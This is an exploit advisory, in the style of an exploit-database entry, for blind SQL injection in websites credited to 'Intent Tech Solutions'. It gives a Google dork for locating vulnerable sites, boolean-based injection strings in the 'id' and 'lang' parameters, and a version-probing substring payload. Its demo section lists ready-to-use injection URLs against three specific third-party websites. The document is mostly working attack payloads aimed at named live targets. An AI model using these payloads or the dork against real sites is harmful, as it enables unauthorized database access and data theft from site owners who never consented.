*********************************************************
#Exploit Title: Intent Tech Solutions - Blind Sql Injection
#Date: 2024-05-19
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed by Intent Tech Solutions"
#Category:webapps
#Tested On: Mac, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://kvsimt-iti.org.in/courses.php?id=4%27%20and%20true--+
* https://kvsimt-iti.org.in/courses.php?id=4%27%20and%20false--+
* https://kvsimt-iti.org.in/courses.php?id=4%27%20and%20substring(@@version,1,1)=5--+
### Demo 2:
* https://www.frcconstruction.in/project-details.php?id=2%27%20and%20true--+
* https://www.frcconstruction.in/project-details.php?id=2%27%20and%20false--+
* https://www.frcconstruction.in/project-details.php?id=2' and substring(@@version,1,1)=5--+
### Demo 3:
* https://www.primeshippingservices.com/services.php?id=4%27%20and%20true--+
* https://www.primeshippingservices.com/services.php?id=4%27%20and%20false--+
* https://www.primeshippingservices.com/services.php?id=4%27%20and%20substring(@@version,1,1)=5--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************